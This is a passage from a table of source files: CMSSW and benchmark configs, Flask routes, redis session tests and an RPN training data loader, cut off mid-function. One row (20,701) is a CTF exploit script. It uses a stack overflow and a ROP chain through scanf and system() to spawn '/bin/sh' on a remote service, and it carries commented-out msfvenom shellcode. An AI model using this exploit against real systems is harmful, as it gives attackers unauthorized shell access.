index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
20,700 | 2512f1fff77540a1e97118ade8a7cc7890fe9db3 | import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras

# CMSSW job: re-run HCAL local reconstruction (hbheprereco) on Run-3 RAW data
# and dump MAHI debugging information into a TFileService ntuple.
process = cms.Process('TEST', eras.Run3)

# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.MessageLogger.cerr.threshold = ''
process.MessageLogger.cerr.FwkReport.reportEvery = 100

# BUG FIX: process.options was assigned twice; the second, empty assignment
# silently discarded wantSummary and SkipEvent. Keep a single options PSet.
process.options = cms.untracked.PSet(
    wantSummary = cms.untracked.bool(True),
    SkipEvent = cms.untracked.vstring('ProductNotFound')
)

process.load('Configuration.EventContent.EventContent_cff')
process.load("Configuration.StandardSequences.GeometryDB_cff")
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('Configuration.StandardSequences.RawToDigi_Data_cff')
process.load('Configuration.StandardSequences.L1Reco_cff')
process.load('Configuration.StandardSequences.Reconstruction_Data_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')

# Process every event in the input file
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(-1)
)

# Input source
process.source = cms.Source("PoolSource",
    fileNames = cms.untracked.vstring('file:/eos/cms/tier0/store/data/Commissioning2021/ZeroBias/RAW/v1/000/346/512/00000/f87a2268-8f93-4389-b708-98a42a50c3e8.root'),
    secondaryFileNames = cms.untracked.vstring()
)

# Output definition
process.RECOoutput = cms.OutputModule("PoolOutputModule",
    dataset = cms.untracked.PSet(
        dataTier = cms.untracked.string('RECO'),
        filterName = cms.untracked.string('')
    ),
    fileName = cms.untracked.string('file:step3.root'),
    outputCommands = process.RECOEventContent.outputCommands,
    splitLevel = cms.untracked.int32(0)
)

# Ntuple output for the MAHI debugger analyzer
process.TFileService = cms.Service("TFileService",
    fileName = cms.string("mahidebugger.root")
)

# Additional output definition
# Other statements
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run3_data', '')
process.hbheprereco.cpu.saveInfos = cms.bool(True)
process.load("RecoLocalCalo.HcalRecAlgos.test.mahiDebugger_cfi")

# Path and EndPath definitions
process.raw2digi_step = cms.Path(process.hcalDigis)
process.reconstruction_step = cms.Path(process.hbheprereco)
process.flat_step = cms.Path(process.mahiDebugger)
process.RECOoutput_step = cms.EndPath(process.RECOoutput)
process.endjob_step = cms.EndPath(process.endOfProcess)

# Schedule definition
# NOTE(review): RECOoutput_step and endjob_step are defined but not scheduled,
# so step3.root is never written -- presumably intentional for a debug job,
# confirm.
process.schedule = cms.Schedule(process.raw2digi_step,process.reconstruction_step,process.flat_step)
|
20,701 | 39a8487e2f856361ee2b13630e3ac3a284939ce8 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-05-13 23:26:33
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
# CTF exploit for ./pwn9: overflow a 0x88-byte stack buffer, then ROP into
# __isoc99_scanf to write "/bin/sh;" to a fixed writable address (0x0804A034)
# and finally call system() on that address.
import roputils,os,time
from pwn import *
context(log_level="debug")
DEBUG = 0  # 1 = debug a local process under gdb, 0 = attack the remote service
target = "./pwn9"
remote_ip = "192.168.5.80"
port = 8000
rop = roputils.ROP(target)  # gadget/PLT lookup helper built from the target binary
# msfvenom -p linux/x86/exec CMD=/bin/sh -b "\x0b\x00" -f python
# buf = ""
# buf += "\x2b\xc9\x83\xe9\xf5\xe8\xff\xff\xff\xff\xc0\x5e\x81"
# buf += "\x76\x0e\x7d\x30\x90\xf9\x83\xee\xfc\xe2\xf4\x17\x3b"
# buf += "\xc8\x60\x2f\x56\xf8\xd4\x1e\xb9\x77\x91\x52\x43\xf8"
# buf += "\xf9\x15\x1f\xf2\x90\x13\xb9\x73\xab\x95\x38\x90\xf9"
# buf += "\x7d\x1f\xf2\x90\x13\x1f\xe3\x91\x7d\x67\xc3\x70\x9c"
# buf += "\xfd\x10\xf9"
buf = "/bin/sh;"  # the trailing ';' terminates the command passed to system()
# bss = rop.section('.bss')
# rop.got('puts')
# rop.call('read', 0, addr_bss, 0x100)
# msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x0b\x0d\x0a'
if DEBUG:
    # NOTE(review): relies on `sys` being re-exported by `from pwn import *`
    p = process(target,env={"LD_LIBRARY_PATH":sys.path[0]})
    gdb.attach(p,"b*0x80487AF\nc")
else:
    p = remote(remote_ip,port)

# Thin aliases over the pwntools tube API
def sl(data):
    p.sendline(data)

def sd(data):
    p.send(data)

def ru(data):
    return p.recvuntil(data)

ru(":")  # wait for the program's prompt
payload = "a"*(0x88+4)  # fill the buffer (0x88) plus saved EBP (4) up to the return address
# scanf("%s" fmt at 0x804888F) reads our string into 0x0804A034, then system() runs it
payload += rop.call('__isoc99_scanf', 0x804888F,0x0804A034)
payload += rop.call('system',0x0804A034)
sl(payload)
sl("1")   # extra input consumed by the program before the scanf -- TODO confirm
sl(buf)   # the string scanf stores at 0x0804A034
p.interactive()
20,702 | 76aa308a982720f1ae75fc8ace2103ef0b679a3c | def sum(a, b):
    # NOTE(review): shadows the builtin sum(). The guard fires only when BOTH
    # arguments are non-positive ('and'), yet the message asks for positive
    # numbers only -- possibly 'or' was intended; confirm against the expected
    # output of the calls below.
    if a <= 0 and b <= 0:
        print("양수만 입력하세요.")  # "Please enter positive numbers only."
        return 0
    return a + b

a = 3
b = 4
c = sum(a, b)  # 7
a = -1
b = 3
c = sum(a, b)  # 2: guard not triggered because only one argument is negative
print(c)
20,703 | 6a06079bfbaf2aa7e8285f80ae346d4517abbedb | from flask import *
from app import app
import random
import uuid
index = Blueprint('index', __name__)
def generateHex():
letters = ("A","B","C","D","E","F","G","H")
numbers = ("1","2","3","4","5","6", "7","8","9")
string1 = ''
for i in range(0,3):
letter = random.choice(letters)
num = random.choice(numbers)
string2 = num.join(letter)
string3 = letter.join(num)
string1 = string1 + string2 + string3
return string1
@app.route('/', methods=['GET', 'POST'])
def do_index():
    """Landing page.

    GET: render the index page, assigning a userID cookie on first visit.
    POST: create a new challenge under a fresh unique short ID and return
    the URL of its page.
    """
    if request.method == 'GET':
        if request.cookies.get('userID'):
            return render_template('index/index.html')
        else:
            resp = make_response(render_template('index/index.html'))
            # BUG FIX: bytes(uuid.uuid4()) raises TypeError on Python 3
            # (UUID objects are not convertible via bytes()); store the
            # canonical string form instead.
            resp.set_cookie('userID', str(uuid.uuid4()))
            return resp
    if request.method == 'POST':
        # Regenerate until the short ID is not already taken
        hexId = generateHex()
        while app.mongo.db.challenge.find_one({'challengeId': hexId}):
            hexId = generateHex()
        challengeName = request.form['challengeName']
        #timer = request.form['timer']
        challenge = {
            'challengeId': hexId,
            'name': challengeName,
            #'timer': timer,
            #'endTime': dateTime.min,
            'submissions': {
                'nextKey': 0
            }
        }
        # NOTE(review): Collection.insert is deprecated in pymongo 3+;
        # switch to insert_one once the driver version is confirmed.
        app.mongo.db.challenge.insert(challenge)
        return (url_for('do_challenge', challengeId=hexId))
|
20,704 | f7df79ca1a87316a08e9a08e9a7142d09c9bcb64 | import time
import unittest
from frontstage import app, redis
from frontstage.common.session import SessionHandler
class TestSession(unittest.TestCase):
    """Integration tests for SessionHandler backed by a real (flushed) redis."""

    def setUp(self):
        # Fresh test client and an empty redis so tests cannot interfere
        self.app = app.test_client()
        self.app.testing = True
        self.redis = redis
        self.redis.flushall()

    def test_create_session(self):
        # Create session and get session key
        session = SessionHandler()
        session.create_session(encoded_jwt='test_jwt')
        session_key = session.session_key
        # Retrieve encoded_jwt from session; redis returns bytes
        test_jwt = self.redis.get(session_key)
        self.assertEqual(test_jwt, 'test_jwt'.encode())

    def test_update_session(self):
        # Create session and get session key
        session = SessionHandler()
        session.create_session(encoded_jwt='test_jwt')
        session_key = session.session_key
        # Wait 3 seconds and update the session
        time.sleep(3)
        session.update_session()
        # Check that the session expiry time has been reset
        # NOTE(review): assumes create_session sets a 3600s TTL and that the
        # TTL is refreshed to exactly 3600 -- confirm against SessionHandler.
        expires_in = redis.ttl(session_key)
        self.assertEqual(expires_in, 3600)

    def test_update_session_with_session_key(self):
        # Same as test_update_session, but passes the key explicitly
        session = SessionHandler()
        session.create_session(encoded_jwt='test_jwt')
        session_key = session.session_key
        # Wait 3 seconds and update the session
        time.sleep(3)
        session.update_session(session_key)
        # Check that the session expiry time has been reset
        expires_in = redis.ttl(session_key)
        self.assertEqual(expires_in, 3600)

    def test_get_encoded_jwt(self):
        # Create session and look the JWT back up through the handler API
        session = SessionHandler()
        session.create_session(encoded_jwt='test_jwt')
        session_key = session.session_key
        encoded_jwt = session.get_encoded_jwt(session_key)
        self.assertEqual(encoded_jwt, 'test_jwt'.encode())

    def test_delete_session(self):
        # Deleting the session must remove the key from redis entirely
        session = SessionHandler()
        session.create_session(encoded_jwt='test_jwt')
        session_key = session.session_key
        session.delete_session(session_key)
        session = redis.get(session_key)
        self.assertEqual(session, None)
|
20,705 | a2ae72a6674583384bc1071f3ea5a50202ba39da |
def devide(a, b):
    """Print a / b; raise IndexError when b is zero.

    Keeps the original (unusual) choice of IndexError so the existing
    handlers below that catch IndexError continue to match.
    """
    if b == 0:
        raise IndexError("被除数不能为0!")
    print(a / b)
# Demonstration of exception-handler ordering: clauses are tried top to
# bottom, so the broad `except Exception` below always matches first and the
# two specific handlers after it are unreachable.
try:
    devide(6,0)
except Exception as e:
    print("所有异常我都能捕捉!!",e) # catches every exception (always chosen first)
except ZeroDivisionError as e:
    print("我处理了第一个异常") # unreachable: the Exception clause above already matched
except IndexError as e:
    print("我处理了第二个异常")# unreachable: the Exception clause above already matched
|
20,706 | 089339a5c90140cc9812e5a8261e7f980ee51258 | from flask import jsonify
from werkzeug.http import HTTP_STATUS_CODES
def bad_request(message=None):
    """Build a 400 Bad Request JSON response.

    Args:
        message: optional human-readable detail added under the 'message' key.

    Returns:
        A flask Response whose JSON body is
        {'error': 'Bad Request'[, 'message': ...]} with status code 400.
    """
    payload = {'error': HTTP_STATUS_CODES.get(400)}
    if message:
        payload['message'] = message
    response = jsonify(payload)
    # BUG FIX: the attribute was misspelled `states_code`, so the response
    # was actually sent with the default 200 status instead of 400.
    response.status_code = 400
    return response
20,707 | ab4089ee28e0f672aa66577c7a812d251d346843 | from flask import Blueprint
# Blueprint for the visualization section; route handlers attach to it in views.py.
visualization = Blueprint('visualization', __name__)
# Imported last, for side effects only: views.py needs the `visualization`
# object defined above (avoids a circular import).
from . import views
|
20,708 | f5d6d9d4ded916eff41ae38b24acee4bca97f1a3 | from benchmarks.htap.lib.controller import HTAPController
def add_parser(subparsers):
    """Register the 'htap' benchmark sub-command and all of its CLI options."""
    p = subparsers.add_parser('htap')

    # Workload shape
    p.add_argument('--oltp-workers', default=32, type=int,
                   help=('The number of OLTP workers executing TPC-C-like transactions (i.e. simulated clients), default: 32.'))
    p.add_argument('--olap-workers', default=1, type=int,
                   help=('The number of OLAP workers (streams) running TPC-H-like queries, default: 1.'))
    p.add_argument('--target-tps', default=None, type=int,
                   help=('The target TPS for the OLTP workload, default: unlimited.'))
    p.add_argument('--duration', default=60, type=int,
                   help=('How many seconds the benchmark should run for, default: 60.'))
    p.add_argument('--olap-timeout', default='5min',
                   help=('Timeout for OLAP queries, default: 5 minutes'))
    p.add_argument('--csv-interval', default=10, type=int,
                   help=('How often to report stats to the csv files in seconds, default: 10'))
    p.add_argument('--dry-run', action='store_true',
                   help=("Only generate transactions and analytical queries but don't send them to the database. "
                         "Can be useful for measuring script throughput."))
    p.add_argument('--monitoring-interval', default=1, type=float,
                   help=('Number of seconds to wait between updates of the monitoring display, default: 1.0'))
    p.add_argument('--stats-dsn',
                   help=('The DSN to use for collecting statistics into a database. '
                         'Not defining it will disable statistics collection.'))
    p.add_argument('--explain-analyze', action='store_true', default=False,
                   help=('Whether to run EXPLAIN ANALYZE. Will save plans into the "plan" directory.'))
    p.add_argument('--use-server-side-cursors', default=False, action='store_true', required=False,
                   help=('Use server-side cursors for executing the queries'))
    p.add_argument('--dont-wait-until-enough-data', default=False, action='store_true', required=False,
                   help=('Do NOT wait until there is enough data for OLAP queries to run with a constant dataset size'))
    p.add_argument('--olap-dsns', nargs='+', required=False,
                   help=('Use separate olap servers'))
    p.add_argument('--output', choices=['csv', 'print'], default='print', nargs='+',
                   help=('How the results output should look like. '
                         'Multiple options possible, separated by space'))
    p.add_argument('--csv-file', default='results.csv',
                   help=('Where to save the summary csv file, if csv output is selected. '
                         'The default is results.csv in the current directory.'))
    p.add_argument('--ignored-queries', required=False, nargs='+', default=[],
                   help=('Optional list of ignored queries for the OLAP workload.'))
def run(args):
    """Entry point for the 'htap' sub-command: build a controller and run it."""
    HTAPController(args).run()
|
20,709 | 6fde02b54237908c430b15d51bca7349e0ccaf00 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# Monkey-patch because I trained with a newer version.
# This can be removed once PyTorch 0.4.x is out.
# See https://discuss.pytorch.org/t/question-about-rebuild-tensor-v2/14560
import torch._utils
try:
    # Newer PyTorch already provides this symbol; nothing to do.
    torch._utils._rebuild_tensor_v2
except AttributeError:
    # Older PyTorch: emulate _rebuild_tensor_v2 on top of _rebuild_tensor so
    # checkpoints pickled by a newer version can still be loaded.
    def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
        tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
        tensor.requires_grad = requires_grad
        tensor._backward_hooks = backward_hooks
        return tensor
    torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
import torch
import torch.nn as nn
from torch.nn import init
import torch.nn.functional as F
import torch.utils.data
from torch.autograd import Variable
from torch.utils.data.dataloader import default_collate
import torchvision
import torchvision.transforms as transforms
from torchvision.utils import save_image
import sys
import os
import time
import numpy as np
import cv2
import argparse
import yaml
import json
import random
import math
import copy
import shutil
import logging
import scipy.sparse
from tqdm import tqdm
from collections import namedtuple
from easydict import EasyDict as edict
from config import CONFIG, config_load
# Load CONFIG
# Parses --config at import time and populates the global CONFIG object
# (this module is a script, not a library).
parser = argparse.ArgumentParser(description='Training code')
parser.add_argument('--config', default='config.yaml', type=str, help='yaml config file')
args = parser.parse_args()
config_load(args.config)
# config_load('config.yaml')
print ('==> CONFIG is: \n', CONFIG, '\n')
# Set logger
logger = logging.getLogger(__name__)
# NOTE(review): `format` shadows the builtin of the same name (harmless in
# this scope, but worth renaming if the module grows).
format = logging.Formatter("%(asctime)s - %(message)s") # output format
sh = logging.StreamHandler(stream=sys.stdout) # output to standard output
sh.setFormatter(format)
logger.addHandler(sh)
# Verbosity follows the loaded config
if CONFIG.DEBUG:
    logger.setLevel(logging.DEBUG)
else:
    logger.setLevel(logging.INFO)
# Create LOG_DIR and SNAPSHOT_DIR
# BUG FIX: LOGDIR and SNAPSHOTDIR were timestamped by two separate
# time.time() calls and could disagree when the calls straddled a second
# boundary; take the timestamp once and reuse it.
_run_stamp = int(time.time())
LOGDIR = os.path.join(CONFIG.LOGS.LOG_DIR, '%s_%d'%(CONFIG.NAME, _run_stamp))
SNAPSHOTDIR = os.path.join(CONFIG.LOGS.SNAPSHOT_DIR, '%s_%d'%(CONFIG.NAME, _run_stamp))
if not os.path.exists(LOGDIR):
    os.makedirs(LOGDIR)
if not os.path.exists(SNAPSHOTDIR):
    os.makedirs(SNAPSHOTDIR)
# Store the code into LOG_DIR/shutil
# Snapshots the working tree next to the logs so a run can always be traced
# back to the exact code that produced it.
if CONFIG.LOGS.LOG_SHUTIL_ON:
    SHUTILDIR = os.path.join(LOGDIR, 'shutil')
    if os.path.exists(SHUTILDIR):
        shutil.rmtree(SHUTILDIR)
    # Never copy the (potentially huge) log/snapshot dirs into the snapshot
    SHUTIL_IGNORELIST = [CONFIG.LOGS.SNAPSHOT_DIR, CONFIG.LOGS.LOG_DIR] + \
        CONFIG.LOGS.LOG_SHUTIL_IGNORELIST
    if os.path.exists(CONFIG.LOGS.LOG_SHUTIL_IGNOREFILE):
        # FIX: close the ignore file deterministically instead of leaking the
        # handle via open(...).readlines().
        with open(CONFIG.LOGS.LOG_SHUTIL_IGNOREFILE) as ignore_file:
            lines = ignore_file.readlines()
        SHUTIL_IGNORELIST += [l.strip() for l in lines]
    print ('==> Shutil Code to File: %s \n'%(SHUTILDIR))
    print ('==> Shutil Ignore Patterns: ', SHUTIL_IGNORELIST, '\n')
    shutil.copytree('./', SHUTILDIR, ignore=shutil.ignore_patterns(*SHUTIL_IGNORELIST))
####################################################################################################
# COCO Dataset
####################################################################################################
# Immutable record describing one level's full field of RPN anchors:
#   field_of_anchors: (K*A, 4) float32 anchor boxes over the whole grid
#   num_cell_anchors: A, anchors per spatial cell
#   stride:           feature-map stride in input pixels
#   field_size:       grid extent (cells per side)
FieldOfAnchors = namedtuple(
    'FieldOfAnchors', [
        'field_of_anchors', 'num_cell_anchors', 'stride', 'field_size'
    ]
)
# Process-local cache of FieldOfAnchors keyed by (stride, sizes, ratios)
_threadlocal_foa = {}
from generate_anchors import generate_anchors
def get_field_of_anchors(stride, anchor_sizes, anchor_aspect_ratios):
    """Return (and cache) the full grid of RPN anchors for one feature level.

    Args:
        stride: feature-map stride in input pixels.
        anchor_sizes: iterable of anchor box sizes (pixels).
        anchor_aspect_ratios: iterable of anchor aspect ratios.

    Returns:
        FieldOfAnchors whose field_of_anchors is a (K*A, 4) float32 array,
        where K is the number of grid cells and A the anchors per cell.
    """
    global _threadlocal_foa
    cache_key = str(stride) + str(anchor_sizes) + str(anchor_aspect_ratios)
    # Idiom fix: test membership on the dict directly instead of .keys()
    if cache_key in _threadlocal_foa:
        return _threadlocal_foa[cache_key]
    # Anchors at a single feature cell
    cell_anchors = generate_anchors(
        stride=stride, sizes=anchor_sizes, aspect_ratios=anchor_aspect_ratios
    )
    num_cell_anchors = cell_anchors.shape[0]
    # Generate canonical proposals from shifted anchors
    # Enumerate all shifted positions on the (H, W) grid
    fpn_max_size = CONFIG.FPN.COARSEST_STRIDE * np.ceil(
        CONFIG.TRAIN.MAX_SIZE / float(CONFIG.FPN.COARSEST_STRIDE)
    )
    field_size = int(np.ceil(fpn_max_size / float(stride)))
    shifts = np.arange(0, field_size) * stride
    shift_x, shift_y = np.meshgrid(shifts, shifts)
    shift_x = shift_x.ravel()
    shift_y = shift_y.ravel()
    shifts = np.vstack((shift_x, shift_y, shift_x, shift_y)).transpose()
    # Broadcast anchors over shifts to enumerate all anchors at all positions
    # in the (H, W) grid:
    #   - add A cell anchors of shape (1, A, 4) to
    #   - K shifts of shape (K, 1, 4) to get
    #   - all shifted anchors of shape (K, A, 4)
    #   - reshape to (K*A, 4) shifted anchors
    A = num_cell_anchors
    K = shifts.shape[0]
    field_of_anchors = (
        cell_anchors.reshape((1, A, 4)) +
        shifts.reshape((1, K, 4)).transpose((1, 0, 2))
    )
    field_of_anchors = field_of_anchors.reshape((K * A, 4))
    foa = FieldOfAnchors(
        field_of_anchors=field_of_anchors.astype(np.float32),
        num_cell_anchors=num_cell_anchors,
        stride=stride,
        field_size=field_size,
    )
    _threadlocal_foa[cache_key] = foa
    return foa
from pycocotools.coco import COCO
from pycocotools import mask as COCOmask
import pycocotools.mask as mask_util
class CocoDataset():
def __init__(self, ImageRoot, AnnoFile):
    """COCO-backed dataset that yields RPN training blobs.

    Args:
        ImageRoot: directory containing the image files.
        AnnoFile: path to the COCO annotation json.
    """
    self.imgroot = ImageRoot
    self.COCO = COCO(AnnoFile)
    # Set up dataset classes
    category_ids = self.COCO.getCatIds()
    categories = [c['name'] for c in self.COCO.loadCats(category_ids)]
    self.category_to_id_map = dict(zip(categories, category_ids))
    # Class index 0 is reserved for background
    self.classes = ['__background__'] + categories
    self.num_classes = len(self.classes)
    # COCO category ids are sparse; map them onto contiguous ids 1..N-1
    self.json_category_id_to_contiguous_id = {
        v: i + 1
        for i, v in enumerate(self.COCO.getCatIds())
    }
    self.contiguous_category_id_to_json_id = {
        v: k
        for k, v in self.json_category_id_to_contiguous_id.items()
    }
    self.image_ids = self.COCO.getImgIds()
    self.image_ids.sort()
    if CONFIG.DEBUG:
        # Small fixed subset for quick debugging runs
        self.image_ids = self.image_ids[0:128]
    # Precompute the single-level anchor grid shared by every sample
    self.foa = get_field_of_anchors(CONFIG.RPN.STRIDE, CONFIG.RPN.SIZES, CONFIG.RPN.ASPECT_RATIOS)
    self.all_anchors = self.foa.field_of_anchors
def __len__(self):
return len(self.image_ids)
def __getitem__(self, idx):
    """Return the training blob dict for sample `idx`.

    Keys: 'data' (CHW float32 image), 'im_info', the rpn_*_wide target
    arrays, and 'roidb' (one-entry list of ground-truth metadata).
    """
    rawdata = self.get_data(idx)
    im_blob, im_scales = self.get_image_blob(rawdata)
    # get_minibatch_blob_names(), get_rpn_blob_names()
    # Single level RPN blobs
    blobs = {
        'im_info': [],
        'rpn_labels_int32_wide': [],
        'rpn_bbox_targets_wide': [],
        'rpn_bbox_inside_weights_wide': [],
        'rpn_bbox_outside_weights_wide': []
    }
    blobs['data'] = im_blob
    # add_rpn_blobs fills the lists above and attaches 'roidb'
    valid = self.add_rpn_blobs(blobs, im_scales, rawdata)
    # Squeeze batch dim (each array is batched with a leading axis of 1)
    for key in blobs:
        if key != 'roidb':
            blobs[key] = blobs[key].squeeze(axis=0)
    # blobs['roidb'] = blob_utils.serialize(blobs['roidb']) ???
    return blobs
def collate_minibatch(self, list_of_blobs):
    """Stack samples separately and return a dict of per-minibatch lists.

    A batch contains NUM_GPUS minibatches, and image sizes may differ between
    minibatches, so samples from each minibatch are stacked separately.
    """
    def pad_image_data(list_of_blobs):
        # Zero-pad every image up to the max H/W within this minibatch so
        # default_collate can stack them into one tensor.
        max_shape = np.array([blobs['data'].shape[1:] for blobs in list_of_blobs]).max(axis=0)
        output_list = []
        for blobs in list_of_blobs:
            data_padded = np.zeros((3, max_shape[0], max_shape[1]), dtype=np.float32)
            _, h, w = blobs['data'].shape
            data_padded[:, :h, :w] = blobs['data']
            blobs['data'] = data_padded
            output_list.append(blobs)
        return output_list
    Batch = {key: [] for key in list_of_blobs[0]}
    # Because roidb consists of entries of variable length, it can't be batched
    # into a tensor. So we keep roidb as a plain list.
    list_of_roidb = [blobs.pop('roidb') for blobs in list_of_blobs]
    for i in range(0, len(list_of_blobs), CONFIG.SOLVER.IMS_PER_BATCH):
        mini_list = list_of_blobs[i:(i + CONFIG.SOLVER.IMS_PER_BATCH)]
        # Pad image data
        mini_list = pad_image_data(mini_list)
        minibatch = default_collate(mini_list)
        minibatch['roidb'] = list_of_roidb[i:(i + CONFIG.SOLVER.IMS_PER_BATCH)]
        for key in minibatch:
            Batch[key].append(minibatch[key])
    return Batch
def _get_rpn_blobs(self, im_height, im_width, foas, all_anchors, gt_boxes):
    """Compute single-level RPN training targets for one image.

    Args:
        im_height, im_width: scaled image size in pixels.
        foas: list of FieldOfAnchors (a single level here).
        all_anchors: (total_anchors, 4) anchor boxes.
        gt_boxes: (G, 4) ground-truth boxes at image scale.

    Returns one dict per field of anchors (a single dict for one level) with
    rpn_labels_int32_wide, rpn_bbox_targets_wide and the inside/outside weight
    arrays, each laid out over the full (H, W, A) anchor grid.

    NOTE(review): `bbox_overlaps` and `bbox_transform_inv` are not imported in
    this excerpt -- presumably provided elsewhere in the module; confirm.
    NOTE(review): when gt_boxes is empty, `anchor_to_gt_max` /
    `anchor_to_gt_argmax` are referenced below without being defined (same
    latent NameError as upstream Detectron).
    """
    total_anchors = all_anchors.shape[0]
    straddle_thresh = CONFIG.TRAIN.RPN_STRADDLE_THRESH
    if straddle_thresh >= 0:
        # Only keep anchors inside the image by a margin of straddle_thresh
        # Set TRAIN.RPN_STRADDLE_THRESH to -1 (or a large value) to keep all
        # anchors
        inds_inside = np.where(
            (all_anchors[:, 0] >= -straddle_thresh) &
            (all_anchors[:, 1] >= -straddle_thresh) &
            (all_anchors[:, 2] < im_width + straddle_thresh) &
            (all_anchors[:, 3] < im_height + straddle_thresh)
        )[0]
        # keep only inside anchors
        anchors = all_anchors[inds_inside, :]
    else:
        inds_inside = np.arange(all_anchors.shape[0])
        anchors = all_anchors
    num_inside = len(inds_inside)
    # Compute anchor labels:
    # label=1 is positive, 0 is negative, -1 is don't care (ignore)
    labels = np.empty((num_inside, ), dtype=np.int32)
    labels.fill(-1)
    if len(gt_boxes) > 0:
        # Compute overlaps between the anchors and the gt boxes overlaps
        anchor_by_gt_overlap = bbox_overlaps(anchors, gt_boxes)
        # Map from anchor to gt box that has highest overlap
        anchor_to_gt_argmax = anchor_by_gt_overlap.argmax(axis=1)
        # For each anchor, amount of overlap with most overlapping gt box
        anchor_to_gt_max = anchor_by_gt_overlap[np.arange(num_inside),
                                                anchor_to_gt_argmax]
        # Map from gt box to an anchor that has highest overlap
        gt_to_anchor_argmax = anchor_by_gt_overlap.argmax(axis=0)
        # For each gt box, amount of overlap with most overlapping anchor
        gt_to_anchor_max = anchor_by_gt_overlap[
            gt_to_anchor_argmax,
            np.arange(anchor_by_gt_overlap.shape[1])
        ]
        # Find all anchors that share the max overlap amount
        # (this includes many ties)
        anchors_with_max_overlap = np.where(
            anchor_by_gt_overlap == gt_to_anchor_max
        )[0]
        # Fg label: for each gt use anchors with highest overlap
        # (including ties)
        labels[anchors_with_max_overlap] = 1
        # Fg label: above threshold IOU
        labels[anchor_to_gt_max >= CONFIG.TRAIN.RPN_POSITIVE_OVERLAP] = 1
    # subsample positive labels if we have too many
    num_fg = int(CONFIG.TRAIN.RPN_FG_FRACTION * CONFIG.TRAIN.RPN_BATCH_SIZE_PER_IM)
    fg_inds = np.where(labels == 1)[0]
    if len(fg_inds) > num_fg:
        disable_inds = np.random.choice(
            fg_inds, size=(len(fg_inds) - num_fg), replace=False
        )
        labels[disable_inds] = -1
    fg_inds = np.where(labels == 1)[0]
    # subsample negative labels if we have too many
    # (samples with replacement, but since the set of bg inds is large most
    # samples will not have repeats)
    num_bg = CONFIG.TRAIN.RPN_BATCH_SIZE_PER_IM - np.sum(labels == 1)
    bg_inds = np.where(anchor_to_gt_max < CONFIG.TRAIN.RPN_NEGATIVE_OVERLAP)[0]
    if len(bg_inds) > num_bg:
        enable_inds = bg_inds[np.random.randint(len(bg_inds), size=num_bg)]
        labels[enable_inds] = 0
    bg_inds = np.where(labels == 0)[0]
    bbox_targets = np.zeros((num_inside, 4), dtype=np.float32)
    bbox_targets[fg_inds, :] = bbox_transform_inv(
        anchors[fg_inds, :], gt_boxes[anchor_to_gt_argmax[fg_inds], :]).astype(np.float32, copy=False)
    # Bbox regression loss has the form:
    #   loss(x) = weight_outside * L(weight_inside * x)
    # Inside weights allow us to set zero loss on an element-wise basis
    # Bbox regression is only trained on positive examples so we set their
    # weights to 1.0 (or otherwise if config is different) and 0 otherwise
    bbox_inside_weights = np.zeros((num_inside, 4), dtype=np.float32)
    bbox_inside_weights[labels == 1, :] = (1.0, 1.0, 1.0, 1.0)
    # The bbox regression loss only averages by the number of images in the
    # mini-batch, whereas we need to average by the total number of example
    # anchors selected
    # Outside weights are used to scale each element-wise loss so the final
    # average over the mini-batch is correct
    bbox_outside_weights = np.zeros((num_inside, 4), dtype=np.float32)
    # uniform weighting of examples (given non-uniform sampling)
    num_examples = np.sum(labels >= 0)
    bbox_outside_weights[labels == 1, :] = 1.0 / num_examples
    bbox_outside_weights[labels == 0, :] = 1.0 / num_examples
    # Map up to original set of anchors
    labels = self._unmap(labels, total_anchors, inds_inside, fill=-1)
    bbox_targets = self._unmap(
        bbox_targets, total_anchors, inds_inside, fill=0
    )
    bbox_inside_weights = self._unmap(
        bbox_inside_weights, total_anchors, inds_inside, fill=0
    )
    bbox_outside_weights = self._unmap(
        bbox_outside_weights, total_anchors, inds_inside, fill=0
    )
    # Split the generated labels, etc. into labels per each field of anchors
    blobs_out = []
    start_idx = 0
    for foa in foas:
        H = foa.field_size
        W = foa.field_size
        A = foa.num_cell_anchors
        end_idx = start_idx + H * W * A
        _labels = labels[start_idx:end_idx]
        _bbox_targets = bbox_targets[start_idx:end_idx, :]
        _bbox_inside_weights = bbox_inside_weights[start_idx:end_idx, :]
        _bbox_outside_weights = bbox_outside_weights[start_idx:end_idx, :]
        start_idx = end_idx
        # labels output with shape (1, A, height, width)
        _labels = _labels.reshape((1, H, W, A)).transpose(0, 3, 1, 2)
        # bbox_targets output with shape (1, 4 * A, height, width)
        _bbox_targets = _bbox_targets.reshape(
            (1, H, W, A * 4)).transpose(0, 3, 1, 2)
        # bbox_inside_weights output with shape (1, 4 * A, height, width)
        _bbox_inside_weights = _bbox_inside_weights.reshape(
            (1, H, W, A * 4)).transpose(0, 3, 1, 2)
        # bbox_outside_weights output with shape (1, 4 * A, height, width)
        _bbox_outside_weights = _bbox_outside_weights.reshape(
            (1, H, W, A * 4)).transpose(0, 3, 1, 2)
        blobs_out.append(
            dict(
                rpn_labels_int32_wide=_labels,
                rpn_bbox_targets_wide=_bbox_targets,
                rpn_bbox_inside_weights_wide=_bbox_inside_weights,
                rpn_bbox_outside_weights_wide=_bbox_outside_weights
            )
        )
    return blobs_out[0] if len(blobs_out) == 1 else blobs_out
def add_rpn_blobs(self, blobs, im_scales, rawdata):
    """Add blobs needed training RPN-only and end-to-end Faster R-CNN models."""
    im_i = 0  # single image per call
    scale = im_scales[im_i]
    im_height = np.round(rawdata['height'] * scale)
